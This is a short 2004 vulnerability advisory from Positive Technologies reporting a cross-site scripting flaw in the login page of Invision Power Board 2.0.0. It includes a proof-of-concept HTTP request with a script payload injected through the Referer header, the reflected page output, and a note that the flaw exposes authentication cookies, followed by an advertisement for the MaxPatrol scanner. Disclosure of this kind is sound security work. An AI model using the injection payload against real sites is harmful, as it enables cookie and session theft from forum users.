[MAXPATROL Security Advisories] Cross site scripting in Invision Power Board

Date: 5.10.2004

Severity: Low

Application: Invision Power Board v2.0.0

 Platform: PHP

 I. DESCRIPTION

An input validation vulnerability was found in Invision Power Board. A
remote user can conduct Cross site scripting attack.

1. 
GET /index.php?s=5875d919a790a7c429c955e4d65b5d54&act=Login&CODE=00 HTTP/1.0

Referer: "'/><script>alert()</script>

Result

<...>
index.php?s=7ff7c2ec2bc7f6e349b326dcee4cf41c&act=Login&CODE=01"
method="post" name="LOGIN" onsubmit="return ValidateForm()"> 
<input type="hidden" name="referer" value="\"\'/><script>alert()</script>"
/> 
<...> 


II. IMPACT


A remote user can access the target user's cookies (including authentication
cookies).   


III. SOLUTION

 Not available currently.



IV. VENDOR FIX/RESPONSE
n/a
 

V. CREDIT

This vulnerability was discovered by Positive Technologies using MaxPatrol
(www.maxpatrol.com) - intellectual professional security scanner. It is able
to detect a substantial amount of vulnerabilities not published yet.
MaxPatrol's intelligent algorithms are also capable to detect a lot of
vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP
Response splitting).